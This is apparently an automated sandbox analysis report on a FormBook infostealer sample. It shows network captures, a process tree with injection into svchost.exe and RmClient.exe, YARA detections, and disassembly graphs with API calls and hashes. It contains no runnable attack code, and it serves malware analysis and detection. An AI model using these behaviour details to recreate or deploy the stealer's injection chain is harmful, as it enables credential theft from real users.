                                                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XbWxhFSXbAFNW4a2yZllsfiJgCAlQoLGN//XLyHJZ256n/ol7Jp5giGeqxeruD6cXTvIRMT5lLB8TEuNq8YubQ==
                                                                                                                    set-cookie: parking_session=27fb0db6-771a-4fc3-8158-a7c0dc03670a; expires=Wed, 09 Oct 2024 12:37:17 GMT; path=/
                                                                                                                    connection: close
                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 58 62 57 78 68 46 53 58 62 41 46 4e 57 34 61 32 79 5a 6c 6c 73 66 69 4a 67 43 41 6c 51 6f 4c 47 4e 2f 2f 58 4c 79 48 4a 5a 32 35 36 6e 2f 6f 6c 37 4a 70 35 67 69 47 65 71 78 65 72 75 44 36 63 58 54 76 49 52 4d 54 35 6c 4c 42 38 54 45 75 4e 71 38 59 75 62 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XbWxhFSXbAFNW4a2yZllsfiJgCAlQoLGN//XLyHJZ256n/ol7Jp5giGeqxeruD6cXTvIRMT5lLB8TEuNq8YubQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                    Oct 9, 2024 14:22:17.289931059 CEST939INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjdmYjBkYjYtNzcxYS00ZmMzLTgxNTgtYTdjMGRjMDM2NzBhIiwicGFnZV90aW1lIjoxNzI4NDc2NT


                                                                                                                    Statistics

                                                                                                                    CPU Usage

                                                                                                                    Click to jump to process

                                                                                                                    Memory Usage

                                                                                                                    Click to jump to process

                                                                                                                    High Level Behavior Distribution

                                                                                                                    Click to dive into process behavior distribution

                                                                                                                    Behavior

                                                                                                                    Click to jump to process

                                                                                                                    System Behavior

                                                                                                                    General

                                                                                                                    Target ID:0
                                                                                                                    Start time:08:18:25
                                                                                                                    Start date:09/10/2024
                                                                                                                    Path:C:\Users\user\Desktop\w64HYOhfv1.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\w64HYOhfv1.exe"
                                                                                                                    Imagebase:0x400000
                                                                                                                    File size:1'363'343 bytes
                                                                                                                    MD5 hash:AC184C685020CEFF107E43CABBA13B4F
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:1
                                                                                                                    Start time:08:18:31
                                                                                                                    Start date:09/10/2024
                                                                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\w64HYOhfv1.exe"
                                                                                                                    Imagebase:0x40000
                                                                                                                    File size:46'504 bytes
                                                                                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1964041630.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1964041630.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1964459528.0000000003600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1964459528.0000000003600000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:3
                                                                                                                    Start time:08:18:44
                                                                                                                    Start date:09/10/2024
                                                                                                                    Path:C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe"
                                                                                                                    Imagebase:0xbe0000
                                                                                                                    File size:140'800 bytes
                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4130314463.0000000002680000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4130314463.0000000002680000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    General

                                                                                                                    Target ID:6
                                                                                                                    Start time:08:18:48
                                                                                                                    Start date:09/10/2024
                                                                                                                    Path:C:\Windows\SysWOW64\RmClient.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\SysWOW64\RmClient.exe"
                                                                                                                    Imagebase:0xe30000
                                                                                                                    File size:15'360 bytes
                                                                                                                    MD5 hash:CE765DCC7CDFDC1BFD94CCB772C75E41
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4129418415.0000000000AD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4129418415.0000000000AD0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4130342799.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4130342799.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:false

                                                                                                                    General

                                                                                                                    Target ID:7
                                                                                                                    Start time:08:19:00
                                                                                                                    Start date:09/10/2024
                                                                                                                    Path:C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe"
                                                                                                                    Imagebase:0xbe0000
                                                                                                                    File size:140'800 bytes
                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    General

                                                                                                                    Target ID:8
                                                                                                                    Start time:08:19:13
                                                                                                                    Start date:09/10/2024
                                                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                    Imagebase:0x7ff6bf500000
                                                                                                                    File size:676'768 bytes
                                                                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Disassembly

                                                                                                                    Reset < >

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:1.5%
                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                      Signature Coverage:8.5%
                                                                                                                      Total number of Nodes:129
                                                                                                                      Total number of Limit Nodes:8
                                                                                                                      execution_graph 74525 2678b35 74526 268c433 NtClose 74525->74526 74527 2678b3f 74526->74527 74402 2673dc3 74403 2673ddd 74402->74403 74408 2677583 74403->74408 74405 2673dfb 74406 2673e2f PostThreadMessageW 74405->74406 74407 2673e40 74405->74407 74406->74407 74409 26775a7 74408->74409 74410 26775e3 LdrLoadDll 74409->74410 74411 26775ae 74409->74411 74410->74411 74411->74405 74528 2673853 74529 2673861 74528->74529 74532 268c6b3 74529->74532 74533 268c6cd 74532->74533 74536 3072c70 LdrInitializeThunk 74533->74536 74534 2673872 74536->74534 74537 267a353 74538 267a3c5 74537->74538 74539 267a36b 74537->74539 74539->74538 74541 267e2b3 74539->74541 74542 267e2d9 74541->74542 74546 267e3cd 74542->74546 74547 268f723 RtlAllocateHeap RtlFreeHeap 74542->74547 74544 267e36b 74545 268ba63 LdrInitializeThunk 74544->74545 74544->74546 74545->74546 74546->74538 74547->74544 74548 267b0b3 74549 267b0f7 74548->74549 74550 267b118 74549->74550 74551 268c433 NtClose 74549->74551 74551->74550 74412 2661ac0 74413 2661ad0 74412->74413 74416 268fb53 74413->74416 74419 268e093 74416->74419 74420 268e0b9 74419->74420 74431 2667413 74420->74431 74422 268e0cf 74423 2661b3d 74422->74423 74434 267aec3 74422->74434 74425 268e0ee 74426 268e103 74425->74426 74449 268c7f3 74425->74449 74445 26880e3 74426->74445 74429 268e11d 74430 268c7f3 ExitProcess 74429->74430 74430->74423 74452 2676243 74431->74452 74433 2667420 74433->74422 74435 267aeef 74434->74435 74476 267adb3 74435->74476 74438 267af34 74441 267af50 74438->74441 74443 268c433 NtClose 74438->74443 74439 267af1c 74440 267af27 74439->74440 74482 268c433 74439->74482 74440->74425 74441->74425 74444 267af46 74443->74444 74444->74425 74446 2688145 74445->74446 74448 2688152 74446->74448 74490 26783f3 74446->74490 74448->74429 74450 268c80d 74449->74450 74451 268c81e ExitProcess 74450->74451 74451->74426 74453 267625d 74452->74453 74455 2676276 74453->74455 74456 268ce83 74453->74456 74455->74433 74458 268ce9d 74456->74458 74457 268cecc 74457->74455 74458->74457 74463 268ba63 74458->74463 74464 268ba80 74463->74464 74470 3072c0a 74464->74470 74465 268baac 74467 268e4c3 74465->74467 74473 268c7a3 74467->74473 74469 268cf3c 74469->74455 74471 3072c1f LdrInitializeThunk 74470->74471 74472 3072c11 74470->74472 74471->74465 74472->74465 74474 268c7bd 74473->74474 74475 268c7ce RtlFreeHeap 74474->74475 74475->74469 74477 267adcd 74476->74477 74481 267aea9 74476->74481 74485 268bb03 74477->74485 74480 268c433 NtClose 74480->74481 74481->74438 74481->74439 74483 268c450 74482->74483 74484 268c461 NtClose 74483->74484 74484->74440 74486 268bb1d 74485->74486 74489 30735c0 LdrInitializeThunk 74486->74489 74487 267ae9d 74487->74480 74489->74487 74492 267841d 74490->74492 74491 267891b 74491->74448 74492->74491 74498 2673a33 74492->74498 74494 267854a 74494->74491 74495 268e4c3 RtlFreeHeap 74494->74495 74496 2678562 74495->74496 74496->74491 74497 268c7f3 ExitProcess 74496->74497 74497->74491 74499 2673a53 74498->74499 74501 2673abc 74499->74501 74503 267b1d3 RtlFreeHeap LdrInitializeThunk 74499->74503 74501->74494 74502 2673ab2 74502->74494 74503->74502 74504 3072b60 LdrInitializeThunk 74505 268f6e3 74506 268e4c3 RtlFreeHeap 74505->74506 74507 268f6f8 74506->74507 74508 26847c3 74509 26847df 74508->74509 74510 268481b 74509->74510 74511 2684807 74509->74511 74513 268c433 NtClose 74510->74513 74512 268c433 NtClose 74511->74512 74514 2684810 74512->74514 74515 2684824 74513->74515 74518 268e5e3 RtlAllocateHeap 74515->74518 74517 268482f 74518->74517 74519 268e5a3 74522 268c753 74519->74522 74521 268e5be 74523 268c76d 74522->74523 74524 268c77e RtlAllocateHeap 74523->74524 74524->74521 74552 2684b53 74557 2684b6c 74552->74557 74553 2684bf9 74554 2684bb4 74555 268e4c3 RtlFreeHeap 74554->74555 74556 2684bc1 74555->74556 74557->74553 74557->74554 74558 2684bf4 74557->74558 74559 268e4c3 RtlFreeHeap 74558->74559 74559->74553 74560 268ba13 74561 268ba2d 74560->74561 74564 3072df0 LdrInitializeThunk 74561->74564 74562 268ba55 74564->74562

                                                                                                                      Executed Functions

                                                                                                                      Function 026783F3 Relevance: 1.7, Strings: 1, Instructions: 435COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 81 26783f3-2678412 82 267841d-2678467 call 268e563 * 2 call 2664a93 call 2684163 81->82 83 2678418 call 268e563 81->83 92 2678926-267892a 82->92 93 267846d-2678497 call 268e513 82->93 83->82 96 26784a2 93->96 97 2678499-26784a0 93->97 98 26784a4-26784ae 96->98 97->98 99 26784b0 98->99 100 26784cf-26784e1 call 2684193 98->100 102 26784b3-26784b6 99->102 107 26784e7-26784ff call 268dee3 100->107 108 2678924-2678925 100->108 104 26784bf-26784c9 102->104 105 26784b8-26784bb 102->105 104->100 105->102 106 26784bd 105->106 106->100 107->108 111 2678505-2678555 call 2673a33 107->111 108->92 111->108 114 267855b-267857b call 268e4c3 111->114 117 267857d-267857f 114->117 118 26785ac-26785ae 114->118 119 26785b7-26785d6 call 267af63 117->119 121 2678581-267858f call 268da53 call 2666f53 117->121 118->119 120 26785b0 118->120 119->108 127 26785dc-26785fe call 268bc33 119->127 120->119 128 2678594-2678599 121->128 131 2678603-2678608 127->131 128->118 130 267859b-26785aa 128->130 132 267860e-2678685 call 268b5d3 call 268b683 call 268e513 130->132 131->108 131->132 139 2678687-267868c 132->139 140 267868e 132->140 141 2678690-26786c0 139->141 140->141 142 26786c6-26786cc 141->142 143 26787a2 141->143 145 26786ce-26786d1 142->145 146 26786dd-26786fe call 268e513 142->146 144 26787a4 143->144 147 26787ab-26787af 144->147 145->142 148 26786d3-26786d8 145->148 153 2678700-2678708 146->153 154 267870a 146->154 151 26787b5-26787b9 147->151 152 26787b1-26787b3 147->152 148->144 151->147 152->151 155 26787bb-26787cf 152->155 156 267870d-2678722 153->156 154->156 157 26787d1-26787d4 155->157 158 267883c-267888c call 2677503 * 2 call 268e4e3 155->158 159 2678735-2678776 call 2677483 call 268e513 156->159 160 2678724 156->160 162 26787d7-26787dc 157->162 190 26788b1-26788b6 158->190 191 267888e-2678892 158->191 184 267877f 159->184 185 2678778-267877d 159->185 163 2678727-267872a 160->163 165 26787f3-26787f7 162->165 166 26787de-26787e1 162->166 168 2678733 163->168 169 267872c-267872f 163->169 165->162 173 26787f9-26787fb 165->173 166->165 171 26787e3-26787e5 166->171 168->159 169->163 174 2678731 169->174 171->165 176 26787e7-26787ea 171->176 173->158 178 26787fd-2678806 173->178 174->159 176->165 180 26787ec 176->180 182 2678808-267880b 178->182 180->165 186 2678836-267883a 182->186 187 267880d-2678810 182->187 188 2678781-26787a0 call 2674993 184->188 185->188 186->158 186->182 187->186 189 2678812-2678814 187->189 188->144 189->186 195 2678816-2678819 189->195 192 26788be-26788d0 call 268b7e3 190->192 193 26788b8 190->193 191->192 196 2678894-26788a5 call 2666fc3 191->196 203 26788d3-26788e8 call 267b133 192->203 193->192 195->186 199 267881b-2678834 195->199 202 26788aa-26788af 196->202 199->186 202->190 202->203 206 26788ea-2678916 call 2677483 * 2 call 268c7f3 203->206 212 267891b-267891e 206->212 212->108
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, Offset: 02660000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_2660000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: CsKC
                                                                                                                      • API String ID: 0-34240546
                                                                                                                      • Opcode ID: c435e3ca53404a323a441e18227f1c5012eb27aad88ca523be44ef7be3a75275
                                                                                                                      • Instruction ID: 9c0765f4ab745e0fab6488cf2bf6e8ce379bbe2e1bfd5947cbdac7acb128d1d8
                                                                                                                      • Opcode Fuzzy Hash: c435e3ca53404a323a441e18227f1c5012eb27aad88ca523be44ef7be3a75275
                                                                                                                      • Instruction Fuzzy Hash: ADF1A070D0021AAFDF24DFA4DC88ABEB7B9AF44304F1482ADE405A7240D7719E45DFA5
                                                                                                                      Function 02677583 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 213 2677583-267759f 214 26775a7-26775ac 213->214 215 26775a2 call 268f1c3 213->215 216 26775b2-26775c0 call 268f7c3 214->216 217 26775ae-26775b1 214->217 215->214 220 26775c2-26775cd call 268fa63 216->220 221 26775d0-26775e1 call 268db63 216->221 220->221 226 26775e3-26775f7 LdrLoadDll 221->226 227 26775fa-26775fd 221->227 226->227
                                                                                                                      APIs
                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 026775F5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, Offset: 02660000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_2660000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Load
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2234796835-0
                                                                                                                      • Opcode ID: fd445b3584a097885adeaa8222717d59799b4ecacb9126208c7b208bd7e5c741
                                                                                                                      • Instruction ID: 45ad219197a848e99451a4ac3b922c7944c252f3f0530b2a6224611ce1ed465d
                                                                                                                      • Opcode Fuzzy Hash: fd445b3584a097885adeaa8222717d59799b4ecacb9126208c7b208bd7e5c741
                                                                                                                      • Instruction Fuzzy Hash: 930121B5D0020DABDF10EBE4DC81F9DB7789B44304F0042A9E90897240FA31E754CBA5
                                                                                                                      Function 0268C433 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 238 268c433-268c46f call 2664853 call 268d653 NtClose
                                                                                                                      APIs
                                                                                                                      • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0268C46A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, Offset: 02660000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_2660000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Close
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3535843008-0
                                                                                                                      • Opcode ID: 25d4ae8e20885b246a0b33a202f6818839664ef0674a9c243f9a03256c03aea3
                                                                                                                      • Instruction ID: 30b5c012fe67c74ab11997d091b59f8d615109012a002e647af3e52e82c9cd31
                                                                                                                      • Opcode Fuzzy Hash: 25d4ae8e20885b246a0b33a202f6818839664ef0674a9c243f9a03256c03aea3
                                                                                                                      • Instruction Fuzzy Hash: 42E046362402487BD220AA69DC04FAB776DDBC5B50F008029FA1CA7242CAB1B9418AB5
                                                                                                                      Function 030735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 467e976f46e37073f495828fbb8c46a225d948725581b2d38fed6297dcbcc567
                                                                                                                      • Instruction ID: 4fb367fa3e6d522a34980a98d149cddb88a1beb4535a50ecc5817c63b3a8f904
                                                                                                                      • Opcode Fuzzy Hash: 467e976f46e37073f495828fbb8c46a225d948725581b2d38fed6297dcbcc567
                                                                                                                      • Instruction Fuzzy Hash: BF90023160650802E100B2588554746104687D0301FA5C411A082456CD87958A5165A2
                                                                                                                      Function 03072B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 252 3072b60-3072b6c LdrInitializeThunk
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: c2864eb0aa40ae442fafd955dad36e1b12e8194d0df41917ff58320859b5bae4
                                                                                                                      • Instruction ID: a2e36d66a1929a559374efda2c289cd63c9344a5a9e14ef8da73e41d35bde325
                                                                                                                      • Opcode Fuzzy Hash: c2864eb0aa40ae442fafd955dad36e1b12e8194d0df41917ff58320859b5bae4
                                                                                                                      • Instruction Fuzzy Hash: CC900261203404035105B2588454656404B87E0301B95C021E1414594DC62589916125
                                                                                                                      Function 03072DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 46e9ba65936f9c5d9cd069e5dceb3c0b7e65d0dc8f9c9eb1b28fd4e7869207c5
                                                                                                                      • Instruction ID: 8a2d8998b189b61c1a792f2cc443a34c8f4efd984ae315557f11c2b3409fa906
                                                                                                                      • Opcode Fuzzy Hash: 46e9ba65936f9c5d9cd069e5dceb3c0b7e65d0dc8f9c9eb1b28fd4e7869207c5
                                                                                                                      • Instruction Fuzzy Hash: 5990023120240813E111B2588544747004A87D0341FD5C412A082455CD97568A52A121
                                                                                                                      Function 03072C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 253 3072c70-3072c7c LdrInitializeThunk
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: eb0aaadc08cf1727cb5fdd83109ed87dfd891d00e2d93714d029c7702ee84b82
                                                                                                                      • Instruction ID: 3562224f492677f2b485cb2cf162425621684dd381711d8bebde34beaf226a28
                                                                                                                      • Opcode Fuzzy Hash: eb0aaadc08cf1727cb5fdd83109ed87dfd891d00e2d93714d029c7702ee84b82
                                                                                                                      • Instruction Fuzzy Hash: 2290023120248C02E110B258C44478A004687D0301F99C411A482465CD879589917121
                                                                                                                      Function 02673D3E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 94threadwindowCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(661035W,00000111,00000000,00000000), ref: 02673E3A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, Offset: 02660000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_2660000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID: 661035W$661035W
                                                                                                                      • API String ID: 1836367815-4108853117
                                                                                                                      • Opcode ID: 99c48c3416ca911200f72af537826d79e8dee8fa2426cbc3ddeff2e83b87a2e1
                                                                                                                      • Instruction ID: 67b484e1364d8185908ff7d5d9903f33308db12dfa69ecfcf6ee91dcd87ae4b8
                                                                                                                      • Opcode Fuzzy Hash: 99c48c3416ca911200f72af537826d79e8dee8fa2426cbc3ddeff2e83b87a2e1
                                                                                                                      • Instruction Fuzzy Hash: 61214732D04298BFEB229BA49CC0EEEBFBCDF42664F044199F94867141D6624D068BA1
                                                                                                                      Function 02673D0A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 77threadwindowCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(661035W,00000111,00000000,00000000), ref: 02673E3A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, Offset: 02660000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_2660000_svchost.jbxd
